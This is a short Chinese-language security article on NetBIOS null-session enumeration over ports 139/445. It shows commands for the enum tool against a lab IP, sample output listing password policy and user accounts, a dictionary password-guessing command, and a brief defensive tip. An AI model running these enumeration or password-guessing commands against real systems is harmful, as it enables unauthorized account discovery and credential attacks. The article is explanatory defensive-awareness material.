战术攻防思维撷粹

核心提示： 【139/445端口问题】众所周知，139/445端口的开放使得我们可以查询NetBIOS名字表，战术攻防思维撷粹(2)，这些表中不仅存放网络共享资源列表，它也藏匿着重要的用户信息，这样的工具具有着双面性，黑帽们(Blackhat)利用这些工具，Razor小组集成了NetBIOS查询特征到

【139/445端口问题】

众所周知，139/445端口的开放使得我们可以查询NetBIOS名字表，这些表中不仅存放网络共享资源列表，它也藏匿着重要的用户信息。

Razor小组集成了NetBIOS查询特征到一个综合工具：enum。可以从razor.bindview.com/tools/desc/enum_readme.html查询到有关enum的使用说明和下载包。Enum能自动建立空会话，攻击者可以得到可以得到很有用的帐户信息和密码策略设置。

C:\toolkit>enum -U -d -P -L -c 192.168.1.151
server: 192.168.1.151
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
……
names:
netbios: Labmachine
domain: Workshop
……
getting user list (pass 1, index 0)... success, got 9.
Administrator ()
attributes:
cifctm ()
attributes:
downsoft attributes:
ftpuser attributes:
Guest ()
attributes: disabled no_passwd
……

以上结果，显示了系统的某些危险漏洞，诸如密码无过期设置，无最短密码设置等，而且也罗列了系统的用户名录。除了枚举用户名外，enum提供远程猜测密码的功能，使用本地字典文件进行一个用户的密码猜：

C:\toolkit>enum -D -u <username> -f <yourdic>

+应对策略

防止用户信息出现NetBIOS名字表，可以通过控制面板停止系统上Alerter和Messenger服务。

作为视窗系统的缔造者- -微软提供NT/W2K资源工具箱(简称为NTRK或者W2RK)容纳了多种强力的管理工具，从Perl脚本语言的实现、各种通用Unix的远程管理工具和网络管理工具，给我们带来了有益的维护检测手段。与此同时，这样的工具具有着双面性，黑帽们(Blackhat)利用这些工具，同样可以轻松进行肆意的攻击。